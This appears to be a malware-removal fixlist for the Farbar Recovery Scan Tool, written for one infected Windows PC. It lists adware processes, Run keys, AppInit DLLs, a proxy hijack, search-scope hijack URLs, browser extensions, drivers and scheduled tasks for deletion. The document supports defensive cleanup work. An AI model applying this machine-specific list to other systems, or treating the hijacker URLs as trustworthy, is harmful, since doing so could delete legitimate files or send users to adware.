CreateRestorePoint:
(VentureOmni Technologies) C:\Users\Pavilion\AppData\Local\JumpstThun357\VOTPrx.exe
() C:\Program Files\shopperz170220161305\Aluobo.exe
() C:\Program Files\shopperz170220161305\Fuuwiili.exe
() C:\Program Files (x86)\NowUSeeItPlayer\NowUSeeItPlayer.exe
() C:\Program Files (x86)\msrtn32\msrtn32.exe
(TODO: <Company name>) C:\Program Files (x86)\Note-up\Note-up.exe
(Google Inc.) C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Temp\20160203\ct.exe
() C:\Program Files (x86)\dataup\dataup.exe
(ArcadeTwist) C:\Users\Pavilion\AppData\Local\ElastiMotio68\Elaccumulate.exe
() C:\Program Files (x86)\msrtn32\cdhtr.exe
() C:\Program Files (x86)\msrtn32\rthdcpd.exe
HKLM-x32\...\Run: [msrtn32] => C:\Program Files (x86)\msrtn32\msrtn32.exe [1140736 2016-01-22] ()
HKLM-x32\...\Run: [Note-up] => C:\Program Files (x86)\Note-up\note-up.exe [6772736 2015-10-09] (TODO: <Company name>)
HKLM-x32\...\Run: [NowUSeeIt Player] => C:\Program Files (x86)\NowUSeeItPlayer\NowUSeeItPlayer.exe [764144 2016-01-11] ()
HKU\S-1-5-21-1747109027-2776113220-583691413-1000\...\Run: [NowUSeeIt Player] => C:\Program Files (x86)\NowUSeeItPlayer\NowUSeeItPlayer.exe [764144 2016-01-11] ()
HKU\S-1-5-21-1747109027-2776113220-583691413-1000\...\Policies\Explorer: [NoInternetIcon] 1
HKU\S-1-5-21-1747109027-2776113220-583691413-1000\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1
AppInit_DLLs: C:\ProgramData\TomorrowGames\STNPM64.dll => C:\ProgramData\TomorrowGames\STNPM64.dll [1096704 2016-01-26] (TomorrowGames)
AppInit_DLLs:  C:\PROGRA~2\SearchProtect\SearchProtect\bin\VC64Loader.dll => No File
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\AllPCoptimizer.exe.lnk [2016-01-24]
ShortcutTarget: AllPCoptimizer.exe.lnk -> C:\Windows\Installer\{20A647C6-0C59-42A7-B3B4-1E95674496BB}\NewShortcut1_4CA89A60165741188EC12DF8484E49A4.exe (Flexera Software LLC)
ProxyServer: [S-1-5-21-1747109027-2776113220-583691413-1000] => 127.0.0.1:18159
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-1747109027-2776113220-583691413-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
SearchScopes: HKLM -> DefaultScope {0644EE93-D778-472f-A0FF-E1416B8B2E3A} URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfQsBVVtAQAwVbV9ZVQtcFQAVdRQBUwoXDAcSdQsABFxGEgBCcR9aFQQTSEcFME0FCFwEURNNfWpdAEsSSWJGInJWDk4=&q={searchTerms}
SearchScopes: HKLM -> {0644EE93-D778-472f-A0FF-E1416B8B2E3A} URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfQsBVVtAQAwVbV9ZVQtcFQAVdRQBUwoXDAcSdQsABFxGEgBCcR9aFQQTSEcFME0FCFwEURNNfWpdAEsSSWJGInJWDk4=&q={searchTerms}
SearchScopes: HKLM -> {6586d803-df30-46d3-a89a-4136c8571d45} URL = hxxp://www.palikan.com/results.php?f=4&a=bfp_cmi_16_07&cd=2XzuyEtN2Y1L1Qzu0CzztD0A0AzyzyyByE0DyEzyzy0C0EtCtN0D0Tzu0StCyDtDzztN1L2XzutAtFtCzztFtCtFyDtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2SyC0Dzzzz0F0E0C0FtGyB0D0DyBtGyBtByDtCtGtA0DyDzztG0BtA0B0DyBzyyDyDtAzz0BtA2QtN1M1F1B2Z1V1N2Y1L1Qzu2StC0BtCyEtA0A0C0CtGtD0F0EyBtGyEtCyByCtG0BtCzz0CtGyEtA0ByDzy0A0B0A0C0DtAyB2QtN0A0LzutB&cr=211330450&ir=&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1747109027-2776113220-583691413-1000 -> DefaultScope {0644EE93-D778-472f-A0FF-E1416B8B2E3A} URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfQsBVVtAQAwVbV9ZVQtcFQAVdRQBUwoXDAcSdQsABFxGEgBCcR9aFQQTSEcFME0FCFwEURNNfWpdAEsSSWJGInJWDk4=&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1747109027-2776113220-583691413-1000 -> {0644EE93-D778-472f-A0FF-E1416B8B2E3A} URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfQsBVVtAQAwVbV9ZVQtcFQAVdRQBUwoXDAcSdQsABFxGEgBCcR9aFQQTSEcFME0FCFwEURNNfWpdAEsSSWJGInJWDk4=&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1747109027-2776113220-583691413-1000 -> {6586d803-df30-46d3-a89a-4136c8571d45} URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfQsBVVtAQAwVbV9ZVQtcFQAVdRQBUwoXDAcSdQsABFxGEgBCcR9aFQQTSEcFME0FCFwEURNNfWpdAEsSSWJGInJWDk4=&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1747109027-2776113220-583691413-1000 -> {8CDE19E6-71C2-4B46-89B7-35F6A18C571A} URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfQsBVVtAQAwVbV9ZVQtcFQAVdRQBUwoXDAcSdQsABFxGEgBCcR9aFQQTSEcFME0FCFwEURNNfWpdAEsSSWJGInJWDk4=&q={searchTerms}
BHO: shopperz170220161305 -> {5372DE0D-02B6-4505-883A-431BBB712096} -> C:\Program Files\shopperz170220161305\Mhnoav64.dll [2016-02-17] ()
BHO: Password Boss -> {99af1bd8-7efc-4361-aed5-8c612492a051} -> C:\WINDOWS\system32\mscoree.dll [2015-10-29] (Microsoft Corporation)
BHO-x32: shopperz170220161305 -> {5372DE0D-02B6-4505-883A-431BBB712096} -> C:\Program Files\shopperz170220161305\Mhnoav.dll [2016-02-17] ()
BHO-x32: Password Boss -> {99af1bd8-7efc-4361-aed5-8c612492a051} -> C:\WINDOWS\SysWOW64\mscoree.dll [2015-10-29] (Microsoft Corporation)
Toolbar: HKLM - Password Boss Toolbar - {2b43dc1c-e3a3-4bad-8242-6fa6302d3f34} - C:\WINDOWS\system32\mscoree.dll [2015-10-29] (Microsoft Corporation)
Toolbar: HKLM-x32 - Password Boss Toolbar - {2b43dc1c-e3a3-4bad-8242-6fa6302d3f34} - C:\WINDOWS\SysWOW64\mscoree.dll [2015-10-29] (Microsoft Corporation)
FF HKLM\...\Firefox\Extensions: [{FF8D2983-3FE2-4DB7-8182-209032C82EAD}] - C:\Program Files\shopperz260120162332\Firefox\{FF8D2983-3FE2-4DB7-8182-209032C82EAD}.xpi
FF Extension: shopperz260120162332 - C:\Program Files\shopperz260120162332\Firefox\{FF8D2983-3FE2-4DB7-8182-209032C82EAD}.xpi [2016-01-26] [not signed]
FF HKLM\...\Firefox\Extensions: [{01597E45-9F85-42DD-8FCD-2996E25BCBD6}] - C:\Program Files\groover270120160530\Firefox\{01597E45-9F85-42DD-8FCD-2996E25BCBD6}.xpi
FF Extension: groover270120160530 - C:\Program Files\groover270120160530\Firefox\{01597E45-9F85-42DD-8FCD-2996E25BCBD6}.xpi [2016-01-26] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{FF8D2983-3FE2-4DB7-8182-209032C82EAD}] - C:\Program Files\shopperz260120162332\Firefox\{FF8D2983-3FE2-4DB7-8182-209032C82EAD}.xpi
FF HKLM-x32\...\Firefox\Extensions: [{01597E45-9F85-42DD-8FCD-2996E25BCBD6}] - C:\Program Files\groover270120160530\Firefox\{01597E45-9F85-42DD-8FCD-2996E25BCBD6}.xpi
CHR NewTab: Default -> "chrome-extension://ljibkigjccbegnbeojkoafejpoiachej/newtab.html","chrome-extension://jlcgehabolcakkjhgmgpkagpolbjlhfa/newtab/newtab-hp.html"
CHR Extension: (Search Module Plus v2) - C:\Users\Pavilion\AppData\Local\Google\Chrome\User Data\Default\Extensions\jlcgehabolcakkjhgmgpkagpolbjlhfa [2016-02-25]
CHR Extension: (Palikan New Tab) - C:\Users\Pavilion\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljibkigjccbegnbeojkoafejpoiachej [2016-02-25]
R3 4A4D9D04-DA07-40F9-8670-5691287EE347; C:\Program Files\shopperz170220161305\Aluobo.exe [232808 2016-02-17] ()
R3 Dataup; C:\Program Files (x86)\dataup\dataup.exe [77824 2015-08-06] () [File not signed] <==== ATTENTION
R2 PBUpdater; C:\Program Files (x86)\PasswordBoss\PBUpdater\PBUpdater.exe [72888 2016-02-12] ()
R3 VOTPrx; C:\Users\Pavilion\AppData\Local\JumpstThun357\VOTPrx.exe [1726800 2015-08-07] (VentureOmni Technologies)
R2 windowsmanagementservice; C:\WINDOWS\SysWOW64\config\systemprofile\AppData\Local\Temp\20160203\ct.exe [850944 2015-07-24] (Google Inc.) [File not signed]
R2 SPDRIVER_1.42.1.10633; C:\Program Files (x86)\ShopperPro3\JSDriver\1.42.1.10633\jsdrv.sys [53048 2016-01-17] ()
R2 VOTw8; C:\WINDOWS\system32\Drivers\VOTw864.sys [44136 2015-08-07] (VentureOmni Technologies)
S1 cherimoya; system32\drivers\cherimoya.sys [X]
C:\Program Files (x86)\ShopperPro3
2016-03-04 07:19 - 2016-03-04 07:19 - 00000000 _____ C:\WINDOWS\SysWOW64\ws.db
2016-03-04 07:08 - 2016-03-04 07:08 - 00000000 ____D C:\ProgramData\36db0c4b-56b3-0
2016-03-03 13:03 - 2016-03-03 13:03 - 00003888 _____ C:\WINDOWS\System32\Tasks\{78F050FA-630C-8830-4A0C-DB36C4C6C07E}
2016-03-03 13:03 - 2016-03-03 13:03 - 00000000 ____D C:\ProgramData\a4d5839c
2016-03-03 13:03 - 2016-03-03 13:03 - 00000000 ____D C:\ProgramData\36db0c4b-40f5-0
2016-03-03 13:03 - 2016-03-03 13:03 - 00000000 ____D C:\ProgramData\{07d02610-312c-0}
2016-03-03 13:03 - 2016-03-03 13:03 - 00000000 ____D C:\ProgramData\{0724b90a-612c-1}
2016-03-02 02:21 - 2016-03-02 02:21 - 00000000 ____D C:\WINDOWS\system32\kaio
2016-03-01 13:17 - 2016-03-01 13:17 - 00000000 ____D C:\WINDOWS\system32\hope
2016-02-26 09:05 - 2016-02-26 09:05 - 00000000 ____D C:\WINDOWS\system32\byjg
2016-02-25 20:31 - 2016-02-25 20:31 - 00000000 ____D C:\WINDOWS\system32\uke
2016-02-25 08:03 - 2016-02-25 08:03 - 00000000 ____D C:\WINDOWS\system32\hebj
2016-02-21 00:16 - 2016-02-21 00:16 - 00000000 ____D C:\WINDOWS\system32\kylq
2016-02-20 21:37 - 2016-02-20 21:37 - 00000000 ____D C:\WINDOWS\system32\mabj
2016-02-18 13:08 - 2016-02-18 13:08 - 00000000 ____D C:\WINDOWS\system32\cao
2016-02-17 13:33 - 2016-02-17 13:37 - 00000000 ____D C:\ProgramData\PasswordBoss
2016-02-17 13:33 - 2016-02-17 13:33 - 00003418 _____ C:\WINDOWS\System32\Tasks\ProfessionalCleaningSoftware_Start
2016-02-17 13:33 - 2016-02-17 13:33 - 00003336 _____ C:\WINDOWS\System32\Tasks\PasswordBoss_Desktop
2016-02-17 13:33 - 2016-02-17 13:33 - 00001130 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Password Boss.lnk
2016-02-17 13:33 - 2016-02-17 13:33 - 00001124 _____ C:\Users\Public\Desktop\Password Boss.lnk
2016-02-17 13:33 - 2016-02-17 13:33 - 00000000 ____D C:\Users\Pavilion\AppData\Roaming\updates
2016-02-17 13:33 - 2016-02-17 13:33 - 00000000 ____D C:\Users\Pavilion\AppData\Local\Professional_Cleaning_Sof
2016-02-17 13:33 - 2016-02-17 13:33 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PasswordBoss
2016-02-17 13:32 - 2016-03-04 20:32 - 00000306 _____ C:\WINDOWS\Tasks\Go_Palikan.job
2016-02-17 13:32 - 2016-03-03 07:32 - 00000000 ____D C:\Users\Pavilion\AppData\Local\{745E4202-50F6-2EBA-3D6E-0B521906F7CA}
2016-02-17 13:32 - 2016-02-17 13:33 - 00000000 ____D C:\Program Files (x86)\PasswordBoss
2016-02-17 13:32 - 2016-02-17 13:32 - 00002790 _____ C:\WINDOWS\System32\Tasks\Go_Palikan
2016-02-17 13:32 - 2016-02-17 13:32 - 00000000 ____D C:\ProgramData\InstallMate
2016-02-17 13:31 - 2016-02-17 13:31 - 00000000 ____D C:\Program Files (x86)\Pro PC Cleaner
2016-02-17 03:55 - 2016-02-17 03:55 - 00000000 ____D C:\WINDOWS\system32\eiko
2016-02-17 03:26 - 2016-03-03 07:50 - 00000000 ____D C:\Program Files\shopperz170220161305
2016-02-17 03:26 - 2016-03-02 22:56 - 00000000 ____D C:\Users\Pavilion\AppData\Roaming\ToqtudDoabje
2016-02-17 03:26 - 2016-02-17 03:26 - 00003424 _____ C:\WINDOWS\System32\Tasks\Ruoijfij
2016-02-17 03:26 - 2016-02-17 03:26 - 00000150 _____ C:\Users\Pavilion\Desktop\FTM+.url
2016-02-17 03:26 - 2016-02-17 03:26 - 00000000 ____D C:\Users\Pavilion\AppData\Local\Shortcut Installer
2016-02-17 03:24 - 2016-02-17 03:24 - 00000000 ____D C:\Users\Pavilion\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Sound+ 1.0
2016-02-17 03:23 - 2016-02-17 03:23 - 00001124 _____ C:\Users\Pavilion\Desktop\VirusDefense.lnk
2016-02-17 03:23 - 2016-02-17 03:23 - 00000000 ____D C:\Users\Pavilion\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VirusDefense
2016-02-17 03:23 - 2016-02-17 03:23 - 00000000 ____D C:\Program Files (x86)\VirusDefense
2016-02-17 03:13 - 2016-03-03 07:45 - 00000000 ____D C:\Users\Pavilion\AppData\Local\30464E43-1455678818-4B31-385A-C80AA9974D49
2016-02-17 03:11 - 2016-03-03 07:51 - 00000000 ____D C:\Program Files (x86)\30464E43-1455707515-4B31-385A-C80AA9974D49
2016-02-17 01:34 - 2016-02-17 01:34 - 00011264 _____ () C:\WINDOWS\errr.exe
2016-02-14 02:32 - 2016-02-14 02:32 - 00000000 ____D C:\WINDOWS\system32\dyk
2016-02-12 19:34 - 2016-02-12 19:34 - 00003919 _____ C:\WINDOWS\ab.bat
2016-02-11 16:10 - 2016-02-11 16:10 - 00000000 ____D C:\WINDOWS\system32\yul
2016-02-10 21:23 - 2016-02-10 21:23 - 00000000 ____D C:\WINDOWS\system32\tecb
2016-02-10 18:54 - 2016-02-10 18:54 - 00000000 ____D C:\WINDOWS\system32\sabm
2016-02-10 15:49 - 2016-02-10 15:49 - 00000000 ____D C:\WINDOWS\system32\katn
2016-02-10 08:53 - 2016-02-10 08:53 - 00000000 ____D C:\WINDOWS\system32\dos
2016-02-09 23:58 - 2016-02-09 23:58 - 00000000 ____D C:\WINDOWS\system32\ooom
2016-02-09 17:08 - 2016-02-09 17:08 - 00000000 ____D C:\WINDOWS\system32\fil
2016-02-09 07:52 - 2016-02-09 07:52 - 00000000 ____D C:\WINDOWS\system32\coe
2016-02-09 01:33 - 2016-02-09 01:33 - 00000000 ____D C:\WINDOWS\system32\vywi
2016-02-08 05:02 - 2016-02-08 05:02 - 00000000 ____D C:\WINDOWS\system32\buo
2016-02-08 01:54 - 2016-02-08 01:54 - 00000000 ____D C:\WINDOWS\system32\ieu
2016-02-07 11:59 - 2016-02-07 11:59 - 00000000 ____D C:\WINDOWS\system32\eih
2016-02-06 17:48 - 2016-02-06 17:48 - 00000000 ____D C:\WINDOWS\system32\lang
2016-02-06 14:15 - 2016-02-06 14:15 - 00000000 ____D C:\WINDOWS\system32\robo
2016-02-06 13:16 - 2016-02-06 13:16 - 00000000 ____D C:\WINDOWS\system32\faw
2016-02-06 11:21 - 2016-02-06 11:21 - 00000000 ____D C:\WINDOWS\system32\nir
2016-02-06 05:49 - 2016-02-06 05:49 - 00000000 ____D C:\WINDOWS\system32\nen
2016-02-05 21:56 - 2016-02-05 21:56 - 00000000 ____D C:\WINDOWS\system32\lodb
2016-02-04 07:36 - 2016-02-04 07:36 - 00000000 ____D C:\WINDOWS\system32\higs
2016-02-03 14:36 - 2016-03-03 07:54 - 00003832 _____ C:\WINDOWS\System32\Tasks\DriverRestore_ScheduledScan
2016-02-03 14:36 - 2016-03-03 07:54 - 00003674 _____ C:\WINDOWS\System32\Tasks\DriverRestore_DailyScan
2016-02-03 14:30 - 2016-03-03 07:58 - 00000000 ____D C:\Program Files (x86)\DriverRestore
2016-02-03 14:30 - 2016-02-03 14:31 - 00001136 _____ C:\Users\Public\Desktop\DriverRestore.lnk
2016-02-03 14:30 - 2016-02-03 14:31 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DriverRestore
2016-02-03 14:30 - 2015-10-09 02:04 - 00020872 _____ (Phoenix Technologies) C:\WINDOWS\SysWOW64\Drivers\DrvAgent64.SYS
2016-02-03 14:29 - 2016-02-03 14:29 - 00000000 ____D C:\WINDOWS\system32\cibh
2016-02-02 19:41 - 2016-03-04 20:20 - 00000302 _____ C:\WINDOWS\Tasks\System HealerStartUp.job
2016-02-02 19:41 - 2016-02-25 07:03 - 00000302 _____ C:\WINDOWS\Tasks\System HealerPeriod.job
2016-02-02 19:41 - 2016-02-02 19:41 - 00002932 _____ C:\WINDOWS\System32\Tasks\System HealerPeriod
2016-02-02 19:41 - 2016-02-02 19:41 - 00002638 _____ C:\WINDOWS\System32\Tasks\System HealerStartUp
2016-02-02 19:40 - 2016-03-03 07:53 - 00000000 ____D C:\Program Files (x86)\SystemHealer
2016-02-02 19:40 - 2016-02-02 19:46 - 00000000 ____D C:\Users\Pavilion\AppData\Roaming\System Healer
2016-02-02 19:40 - 2016-02-02 19:40 - 00003688 _____ C:\WINDOWS\System32\Tasks\System Healer Task
2016-02-02 19:40 - 2016-02-02 19:40 - 00003428 _____ C:\WINDOWS\System32\Tasks\SystemHealer Run Delay
2016-02-02 19:40 - 2016-02-02 19:40 - 00003358 _____ C:\WINDOWS\System32\Tasks\SystemHealer Monitor
2016-02-02 19:40 - 2016-02-02 19:40 - 00001124 _____ C:\Users\Public\Desktop\Launch System Healer.lnk
2016-02-02 19:40 - 2016-02-02 19:40 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Healer
2016-02-02 19:39 - 2016-02-03 18:15 - 00000000 ____D C:\Users\Pavilion\AppData\Local\NowUSeeItPlayer
2016-02-02 19:39 - 2016-02-02 19:39 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NowUSeeIt Player
2016-02-02 19:39 - 2016-02-02 19:39 - 00000000 ____D C:\Program Files (x86)\NowUSeeItPlayer
2016-02-02 19:38 - 2016-03-04 21:24 - 00000300 _____ C:\WINDOWS\Tasks\JumpstaOf815.job
2016-02-02 19:38 - 2016-03-04 20:49 - 00000300 _____ C:\WINDOWS\Tasks\PanoramiShoc77.job
2016-02-02 19:38 - 2016-03-04 20:24 - 00010712 _____ C:\WINDOWS\SysWOW64\VOTPrxOff.ini
2016-02-02 19:38 - 2016-03-04 20:24 - 00010712 _____ C:\WINDOWS\system32\VOTPrxOff.ini
2016-02-02 19:38 - 2016-02-02 19:38 - 00003218 _____ C:\WINDOWS\System32\Tasks\PanoramiShoc77
2016-02-02 19:38 - 2016-02-02 19:38 - 00003214 _____ C:\WINDOWS\System32\Tasks\JumpstaOf815
2016-02-02 19:38 - 2016-02-02 19:38 - 00000000 ____D C:\Users\Pavilion\AppData\Local\JumpstThun357
2016-02-02 19:38 - 2016-02-02 19:38 - 00000000 ____D C:\Users\Pavilion\AppData\Local\ElastiMotio68
2016-02-02 19:38 - 2015-08-07 15:01 - 00044136 _____ (VentureOmni Technologies) C:\WINDOWS\system32\Drivers\VOTw864.sys
2016-02-02 19:36 - 2016-03-03 07:53 - 00000000 ____D C:\Program Files (x86)\Search Web Know
2016-02-02 19:36 - 2016-03-02 22:56 - 00000000 ____D C:\ProgramData\219d5106-5a99-41fd-b942-db6b503b0178
2016-02-02 19:35 - 2016-03-02 22:17 - 00000000 ____D C:\Users\Pavilion\AppData\Local\UpdateAdmin
2016-02-02 19:35 - 2016-02-02 19:35 - 00003918 _____ C:\WINDOWS\System32\Tasks\UpdateAdmin
2016-02-02 19:35 - 2016-02-02 19:35 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\UpdateAdmin
2016-01-30 04:56 - 2016-01-30 04:56 - 00000000 ____D C:\WINDOWS\system32\opac
2016-01-29 18:34 - 2016-01-29 18:34 - 00000000 ____D C:\WINDOWS\system32\owa
2016-01-29 09:14 - 2016-01-29 09:14 - 00000000 ____D C:\WINDOWS\system32\lurb
2016-01-29 08:11 - 2016-01-29 08:11 - 00000000 ____D C:\WINDOWS\system32\foh
2016-01-28 10:00 - 2016-01-28 10:00 - 00000000 ____D C:\WINDOWS\system32\bolp
2016-01-28 00:13 - 2016-01-28 00:13 - 00001128 _____ C:\Users\Pavilion\Desktop\Weather Wizard.lnk
2016-01-28 00:13 - 2016-01-28 00:13 - 00000000 ____D C:\Users\Pavilion\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Weather Wizard
2016-01-28 00:13 - 2016-01-28 00:13 - 00000000 ____D C:\Program Files (x86)\Weather Wizard
2016-01-28 00:05 - 2016-03-04 21:10 - 00000440 ____H C:\WINDOWS\Tasks\GFWRCXRFILHBOWQG.job
2016-01-28 00:05 - 2016-03-04 20:20 - 00000384 _____ C:\WINDOWS\Tasks\OPJRVQSN1.job
2016-01-28 00:05 - 2016-03-03 07:45 - 00000000 ____D C:\ProgramData\TomorrowGames
2016-01-28 00:05 - 2016-03-03 07:45 - 00000000 ____D C:\ProgramData\Service1104
2016-01-28 00:05 - 2016-01-28 00:05 - 00003454 _____ C:\WINDOWS\System32\Tasks\GFWRCXRFILHBOWQG
2016-01-28 00:05 - 2016-01-28 00:05 - 00002952 _____ C:\WINDOWS\System32\Tasks\OPJRVQSN1
2016-01-28 00:05 - 2016-01-28 00:05 - 00001922 _____ C:\Users\Public\Desktop\Play Games.lnk
2016-01-28 00:05 - 2016-01-28 00:05 - 00000000 ____D C:\ProgramData\19a87fa1ec024bbcbb41931263354405
2016-01-27 23:42 - 2016-01-27 23:43 - 00000000 ____D C:\Program Files (x86)\msrtn32
2016-01-27 23:28 - 2016-01-27 23:28 - 00000000 ____D C:\WINDOWS\system32\paif
2016-01-27 15:54 - 2016-01-27 15:54 - 00000000 ____D C:\WINDOWS\system32\wha
2016-01-27 08:42 - 2016-01-27 08:42 - 00000000 ____D C:\WINDOWS\system32\goc
2016-01-26 23:38 - 2016-01-26 23:38 - 00001341 _____ C:\Users\Public\Desktop\Solid YouTube Downloader and Converter.lnk
2016-01-26 23:38 - 2016-01-26 23:38 - 00000000 ____D C:\Users\Pavilion\AppData\Roaming\youtube-downloader-and-converter
2016-01-26 23:38 - 2016-01-26 23:38 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Solid YouTube Downloader and Converter
2016-01-26 23:38 - 2016-01-26 23:38 - 00000000 ____D C:\Program Files (x86)\Solid YouTube Downloader and Converter
2016-01-26 22:10 - 2016-03-03 07:45 - 00000000 ____D C:\Users\Pavilion\AppData\Local\21299
2016-01-26 21:59 - 2016-03-03 07:46 - 00000000 ____D C:\Users\Pavilion\AppData\Local\Birds365
2016-01-26 21:59 - 2016-03-03 07:46 - 00000000 ____D C:\Users\Pavilion\AppData\Local\Birds
2016-01-26 21:53 - 2016-03-03 07:50 - 00000000 ____D C:\Program Files\groover270120160530
2016-01-26 21:53 - 2016-01-26 21:53 - 00003422 _____ C:\WINDOWS\System32\Tasks\Hicpadf
2016-01-26 21:50 - 2016-03-02 22:56 - 00000000 ____D C:\Users\Pavilion\AppData\Local\SearchModule
2016-01-26 21:50 - 2016-03-02 22:48 - 00000000 ____D C:\Users\Pavilion\AppData\Roaming\BejmaDua
2016-01-26 21:50 - 2016-02-17 03:26 - 00000000 ____D C:\Users\Pavilion\AppData\Local\Tempfolder
2016-01-26 21:50 - 2016-01-26 21:50 - 00003534 _____ C:\WINDOWS\System32\Tasks\SMWUpd
2016-01-26 21:50 - 2016-01-26 21:50 - 00003506 _____ C:\WINDOWS\System32\Tasks\RSPro
2016-01-26 21:47 - 2016-03-03 07:51 - 00000000 ____D C:\Program Files\shopperz260120162332
2016-01-26 21:47 - 2016-01-26 21:47 - 00003422 _____ C:\WINDOWS\System32\Tasks\Ioagapi
2016-01-26 21:47 - 2016-01-26 21:47 - 00000000 ____D C:\Users\Pavilion\AppData\LocalLow\Company
2016-01-26 21:47 - 2016-01-26 21:47 - 00000000 ____D C:\Users\Pavilion\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A}
2016-01-26 21:47 - 2016-01-26 21:47 - 00000000 _____ C:\WINDOWS\SysWOW64\Number of results
2016-01-26 07:29 - 2016-03-04 20:21 - 00000000 ____D C:\Users\Pavilion\AppData\Local\mstrn32
2016-01-26 07:29 - 2016-03-03 07:37 - 00000000 ____D C:\Program Files (x86)\cpx
2016-01-26 07:29 - 2016-01-26 07:29 - 00000000 ____D C:\Users\Pavilion\AppData\Local\cpx
2016-01-24 20:43 - 2016-03-03 07:48 - 00000000 __SHD C:\Users\Pavilion\AppData\Local\winone
2016-01-24 20:43 - 2016-01-24 20:43 - 00000000 ___HD C:\Users\Pavilion\AppData\Local\SatakMalwareBusterSetup
2016-01-24 20:43 - 2016-01-24 20:43 - 00000000 ___HD C:\Users\Pavilion\AppData\Local\One10_PC_CleanerUn
2016-01-24 20:43 - 2016-01-24 20:43 - 00000000 ____D C:\Users\Pavilion\AppData\Local\One10_PC_Cleaner
2016-01-24 20:42 - 2016-01-24 20:42 - 00000000 ____D C:\Users\Pavilion\AppData\Local\TVTime
2016-01-24 20:41 - 2016-02-04 07:39 - 00000000 ____D C:\ProgramData\DataFile
2016-01-24 20:41 - 2016-01-27 08:41 - 00000000 ____D C:\Users\Pavilion\AppData\Local\bvxvbxxvaa
2016-01-24 20:41 - 2016-01-27 08:41 - 00000000 ____D C:\ProgramData\LrwHplZXAyh
2016-01-24 20:41 - 2016-01-24 20:42 - 00003554 _____ C:\WINDOWS\System32\Tasks\bvxvbxxvaa
2016-01-24 20:41 - 2016-01-24 20:41 - 00002631 _____ C:\Users\Public\Desktop\AllPCOptimizer.exe.lnk
2016-01-24 20:41 - 2016-01-24 20:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\All PC Optimizer
2016-01-24 20:41 - 2016-01-24 20:41 - 00000000 ____D C:\Program Files (x86)\AllPCOptimizer
2016-01-24 20:39 - 2016-03-04 20:44 - 00000372 ____H C:\WINDOWS\Tasks\YPAYFOUHKEKEJOJX.job
2016-01-24 20:39 - 2016-03-02 22:58 - 00000000 ____D C:\ProgramData\Service1291
2016-01-24 20:39 - 2016-01-24 20:39 - 00003454 _____ C:\WINDOWS\System32\Tasks\YPAYFOUHKEKEJOJX
2016-01-24 20:39 - 2016-01-24 20:39 - 00000000 ____D C:\ProgramData\28341ff220e0446c9fff27c4493d622e
2016-01-24 20:32 - 2016-03-03 13:04 - 00000000 ____D C:\ProgramData\a24e8dd4-1935-0
2016-01-24 20:32 - 2016-03-03 13:04 - 00000000 ____D C:\ProgramData\a24e8dd4-0e61-1
2016-01-24 20:32 - 2016-03-03 07:53 - 00000000 ____D C:\Program Files (x86)\OneSystemCare
2016-01-24 20:32 - 2016-03-03 07:43 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\One System Care
2016-01-24 20:32 - 2016-02-25 07:02 - 00000306 _____ C:\WINDOWS\Tasks\One System CarePeriod.job
2016-01-24 20:32 - 2016-01-24 20:37 - 00000000 ____D C:\Users\Pavilion\AppData\Roaming\One System Care
2016-01-24 20:32 - 2016-01-24 20:32 - 00003692 _____ C:\WINDOWS\System32\Tasks\One System Care Task
2016-01-24 20:32 - 2016-01-24 20:32 - 00003438 _____ C:\WINDOWS\System32\Tasks\One System Care Run Delay
2016-01-24 20:32 - 2016-01-24 20:32 - 00003368 _____ C:\WINDOWS\System32\Tasks\One System Care Monitor
2016-01-24 20:32 - 2016-01-24 20:32 - 00002940 _____ C:\WINDOWS\System32\Tasks\One System CarePeriod
2016-01-24 20:32 - 2016-01-24 20:32 - 00001136 _____ C:\Users\Public\Desktop\Launch One System Care.lnk
2016-01-24 20:31 - 2016-03-03 07:45 - 00000000 ____D C:\Users\Pavilion\AppData\Local\30464E43-1453667467-4B31-385A-C80AA9974D49
2016-01-24 20:31 - 2016-01-24 20:31 - 00023280 _____ C:\WINDOWS\System32\Tasks\{7E0C0947-797E-0F09-0911-780A780E117A}
2016-01-24 20:31 - 2016-01-24 20:31 - 00000000 ____D C:\ProgramData\f3b6a8f4-3dc7-0
2016-01-24 20:31 - 2016-01-24 20:31 - 00000000 ____D C:\ProgramData\f3b6a8f4-3287-1
2016-01-24 20:30 - 2016-01-24 20:30 - 00000000 ____D C:\Program Files (x86)\30464E43-1453696244-4B31-385A-C80AA9974D49
2016-01-24 20:30 - 2016-01-24 20:29 - 00001110 _____ C:\WINDOWS\system32\Drivers\etc\hp.bak
